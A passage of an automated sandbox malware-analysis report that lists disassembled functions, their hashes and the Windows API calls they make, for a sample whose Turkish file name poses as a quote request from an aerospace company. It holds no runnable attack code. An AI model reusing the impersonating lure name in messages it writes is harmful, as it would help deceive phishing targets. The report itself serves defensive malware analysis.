                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                    • Opcode ID: 37a49a9b1971ed72aef28b2b0b9ef9f1f033380bff037a824966135aa16f71c8
                                                                                                                                    • Instruction ID: 3532c6cba62345ebf125c6608bf89c991fc24637b829d2a4a84dd06806c9ecbe
                                                                                                                                    • Opcode Fuzzy Hash: 37a49a9b1971ed72aef28b2b0b9ef9f1f033380bff037a824966135aa16f71c8
                                                                                                                                    • Instruction Fuzzy Hash: B601423F60E311BFAA692BB97C89B772A94EF2B3793300229F430882F0EF114E055144
                                                                                                                                    APIs
                                                                                                                                    • GetLastError.KERNEL32(?,?,001B5686,001C3CD6,?,00000000,?,001B5B6A,?,?,?,?,?,001AE6D1,?,00248A48), ref: 001B2D78
                                                                                                                                    • _free.LIBCMT ref: 001B2DAB
                                                                                                                                    • _free.LIBCMT ref: 001B2DD3
                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,001AE6D1,?,00248A48,00000010,00184F4A,?,?,00000000,001C3CD6), ref: 001B2DE0
                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,001AE6D1,?,00248A48,00000010,00184F4A,?,?,00000000,001C3CD6), ref: 001B2DEC
                                                                                                                                    • _abort.LIBCMT ref: 001B2DF2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                    • Opcode ID: 5c8186f69d3b03add0917d446ca9f02e06fb50f5f9c1c234ef79259a25bdb52c
                                                                                                                                    • Instruction ID: e5ac5f2181554d7dfc4eb6fd488d01ffbb9ce9816031177ed6525e080beb29e8
                                                                                                                                    • Opcode Fuzzy Hash: 5c8186f69d3b03add0917d446ca9f02e06fb50f5f9c1c234ef79259a25bdb52c
                                                                                                                                    • Instruction Fuzzy Hash: 55F0FC3954561037C61237B8BC0EEDF2559AFE77A1F354518F838D31D6EF3488095160
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00199639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00199693
                                                                                                                                      • Part of subcall function 00199639: SelectObject.GDI32(?,00000000), ref: 001996A2
                                                                                                                                      • Part of subcall function 00199639: BeginPath.GDI32(?), ref: 001996B9
                                                                                                                                      • Part of subcall function 00199639: SelectObject.GDI32(?,00000000), ref: 001996E2
                                                                                                                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00218A4E
                                                                                                                                    • LineTo.GDI32(?,00000003,00000000), ref: 00218A62
                                                                                                                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00218A70
                                                                                                                                    • LineTo.GDI32(?,00000000,00000003), ref: 00218A80
                                                                                                                                    • EndPath.GDI32(?), ref: 00218A90
                                                                                                                                    • StrokePath.GDI32(?), ref: 00218AA0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 43455801-0
                                                                                                                                    • Opcode ID: 6d11d4b772fb74fdb12cb2f92d6e0ca5e77162e517337904b51e6d08d3557847
                                                                                                                                    • Instruction ID: 0c299140a1c0aa416504fdba5ee69e964cabd6e04515331075ce8a1c0f34ffbb
                                                                                                                                    • Opcode Fuzzy Hash: 6d11d4b772fb74fdb12cb2f92d6e0ca5e77162e517337904b51e6d08d3557847
                                                                                                                                    • Instruction Fuzzy Hash: 5611F776040149FFDB129F94EC88EEA7FACEB18350F10C012BA199A1A1CB719D65DBA0
                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(00000000), ref: 001E5218
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 001E5229
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001E5230
                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 001E5238
                                                                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 001E524F
                                                                                                                                    • MulDiv.KERNEL32(000009EC,00000001,?), ref: 001E5261
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1035833867-0
                                                                                                                                    • Opcode ID: f3c0adbc2e53e95a9bada5299be27f2043885196e32882bd52c006c40b8469c6
                                                                                                                                    • Instruction ID: 392184195682f698d81810aa6a16c05f8eadace3554f9752f90c78521ba051b7
                                                                                                                                    • Opcode Fuzzy Hash: f3c0adbc2e53e95a9bada5299be27f2043885196e32882bd52c006c40b8469c6
                                                                                                                                    • Instruction Fuzzy Hash: 8D018475A40705BBEB105BA69C49A9EBF78EB58751F148065FA08A7280DA719900CB60
                                                                                                                                    APIs
                                                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00181BF4
                                                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00181BFC
                                                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00181C07
                                                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00181C12
                                                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00181C1A
                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00181C22
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Virtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4278518827-0
                                                                                                                                    • Opcode ID: 2151c0a13a56858a28ed0cebee08e80af3442c0c960db77ad9603caa7412d156
                                                                                                                                    • Instruction ID: 61e2c67f53321e45fe01f4c7791b044cc48ab7f5153a7582e2b0e54d6292579e
                                                                                                                                    • Opcode Fuzzy Hash: 2151c0a13a56858a28ed0cebee08e80af3442c0c960db77ad9603caa7412d156
                                                                                                                                    • Instruction Fuzzy Hash: 390167B0942B5ABDE3008F6A8C85B52FFA8FF59354F00411BA15C4BA42C7F5A864CBE5
                                                                                                                                    APIs
                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 001EEB30
                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 001EEB46
                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 001EEB55
                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001EEB64
                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001EEB6E
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001EEB75
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 839392675-0
                                                                                                                                    • Opcode ID: 3fd2a7e1ad161dd2e6a7740b918773493be7f5177977d7b5c82de7d6433eb901
                                                                                                                                    • Instruction ID: ac352fe1ea92370a47fd2ca5115edc4762b8baa2ef45f0bfd07b76f3203397fb
                                                                                                                                    • Opcode Fuzzy Hash: 3fd2a7e1ad161dd2e6a7740b918773493be7f5177977d7b5c82de7d6433eb901
                                                                                                                                    • Instruction Fuzzy Hash: 4EF03076580558BBE7215B52EC0DEEF3A7CEFDAB11F108158F611D1091DBA05A01C6B5
                                                                                                                                    APIs
                                                                                                                                    • GetClientRect.USER32(?), ref: 001D7452
                                                                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 001D7469
                                                                                                                                    • GetWindowDC.USER32(?), ref: 001D7475
                                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 001D7484
                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 001D7496
                                                                                                                                    • GetSysColor.USER32(00000005), ref: 001D74B0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 272304278-0
                                                                                                                                    • Opcode ID: cf76021b49918c208a4dca1dc0840237264f72e0786874b3940215d7cba16de2
                                                                                                                                    • Instruction ID: c99bc274a2e8b7052cd3067a3115379718ccc0377de30615e8d6af7a881181d1
                                                                                                                                    • Opcode Fuzzy Hash: cf76021b49918c208a4dca1dc0840237264f72e0786874b3940215d7cba16de2
                                                                                                                                    • Instruction Fuzzy Hash: 48018B35440215FFDB515F64EC0CBEA7BB6FB14311F618064F915A21A0CF311E51EB10
                                                                                                                                    APIs
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001E187F
                                                                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 001E188B
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 001E1894
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 001E189C
                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 001E18A5
                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 001E18AC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 146765662-0
                                                                                                                                    • Opcode ID: 522c962ecd33e1a52d4b9c936891499dbfd8b8221a8636e994aa06534cef5903
                                                                                                                                    • Instruction ID: 25cb0deca085d5360960f5f8d77f6aaaa51499e2af06e55e78d9299f9dcf5f2c
                                                                                                                                    • Opcode Fuzzy Hash: 522c962ecd33e1a52d4b9c936891499dbfd8b8221a8636e994aa06534cef5903
                                                                                                                                    • Instruction Fuzzy Hash: 86E0ED3A484211BBD7016FA1FD0C985BF39FF69721720C220F22981070CF725421DF90
                                                                                                                                    APIs
                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 0018BEB3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                    • String ID: D%%$D%%$D%%$D%%D%%
                                                                                                                                    • API String ID: 1385522511-676076623
                                                                                                                                    • Opcode ID: 65ef531cbba3048c8123de59afe0df073b90f53c0de03c22e167688c3849934f
                                                                                                                                    • Instruction ID: e6fc7cf53b8f650e410de3893ed5fad7912119a22bacf50d1c37b2a1b71260b7
                                                                                                                                    • Opcode Fuzzy Hash: 65ef531cbba3048c8123de59afe0df073b90f53c0de03c22e167688c3849934f
                                                                                                                                    • Instruction Fuzzy Hash: 87913A75A0820ADFCB18DF98C0D06AAB7F1FF59314F64416AD945AB351E731AE81CF90
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00187620: _wcslen.LIBCMT ref: 00187625
                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001EC6EE
                                                                                                                                    • _wcslen.LIBCMT ref: 001EC735
                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001EC79C
                                                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 001EC7CA
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 1227352736-4108050209
                                                                                                                                    • Opcode ID: 7c41b615054fa75fd117c9c5a1b9faeb0555d2951ba64fd803adf2eb8a044fba
                                                                                                                                    • Instruction ID: 811962844adf31011f452041724ed57b7b97a49fd701813bfe6ff4c6f6d879b1
                                                                                                                                    • Opcode Fuzzy Hash: 7c41b615054fa75fd117c9c5a1b9faeb0555d2951ba64fd803adf2eb8a044fba
                                                                                                                                    • Instruction Fuzzy Hash: EE51F272A047819BD7149F2ACC85BAFB7E4AF5A310F04092DF991D3290DB70DD46CB92
                                                                                                                                    APIs
                                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0020AEA3
                                                                                                                                      • Part of subcall function 00187620: _wcslen.LIBCMT ref: 00187625
                                                                                                                                    • GetProcessId.KERNEL32(00000000), ref: 0020AF38
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0020AF67
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                    • String ID: <$@
                                                                                                                                    • API String ID: 146682121-1426351568
                                                                                                                                    • Opcode ID: 060496c6fe69b0da8b8c98d94a4b8b56a9d11477a53dcca4acd32c14bbdbbdc9
                                                                                                                                    • Instruction ID: 717195bd68044981637d35a90a319c9411b3d35c80e63ed2746cf9e4aacbfad1
                                                                                                                                    • Opcode Fuzzy Hash: 060496c6fe69b0da8b8c98d94a4b8b56a9d11477a53dcca4acd32c14bbdbbdc9
                                                                                                                                    • Instruction Fuzzy Hash: 17715575A10719DFCB14EF54D484A9EBBF0BF08304F5484A9E816AB692CB71EE41CFA1
                                                                                                                                    APIs
                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 001E7206
                                                                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 001E723C
                                                                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 001E724D
                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 001E72CF
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                    • String ID: DllGetClassObject
                                                                                                                                    • API String ID: 753597075-1075368562
                                                                                                                                    • Opcode ID: a82c770ac99c94b638bbe03974d64e65b168816c030980e8fae3dedbf873e51e
                                                                                                                                    • Instruction ID: 2e0a344ada61b976f6a86653d06f867b57229c84291ae9b7097c056b490f2641
                                                                                                                                    • Opcode Fuzzy Hash: a82c770ac99c94b638bbe03974d64e65b168816c030980e8fae3dedbf873e51e
                                                                                                                                    • Instruction Fuzzy Hash: 1341B671604646EFEB15CF55C884A9E7BB9EF54310F1580ADBE059F28AD7B0DD40CBA0
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00212F8D
                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00212F94
                                                                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00212FA9
                                                                                                                                    • DestroyWindow.USER32(?), ref: 00212FB1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                    • String ID: SysAnimate32
                                                                                                                                    • API String ID: 3529120543-1011021900
                                                                                                                                    • Opcode ID: 6a52cd59a31b010770809858e8e83968d0d44b6e320b727a44476a92dcef0639
                                                                                                                                    • Instruction ID: 528a4c7d98de328526719fc4fecc57f87cfb0664a7e536528fa71016bf795e31
                                                                                                                                    • Opcode Fuzzy Hash: 6a52cd59a31b010770809858e8e83968d0d44b6e320b727a44476a92dcef0639
                                                                                                                                    • Instruction Fuzzy Hash: 4D21887122020AEBEB204E64AC84EFB37F9EB69364F104218F95092590D771DCB69B60
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,001A4D1E,001B28E9,?,001A4CBE,001B28E9,002488B8,0000000C,001A4E15,001B28E9,00000002), ref: 001A4D8D
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001A4DA0
                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,001A4D1E,001B28E9,?,001A4CBE,001B28E9,002488B8,0000000C,001A4E15,001B28E9,00000002,00000000), ref: 001A4DC3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
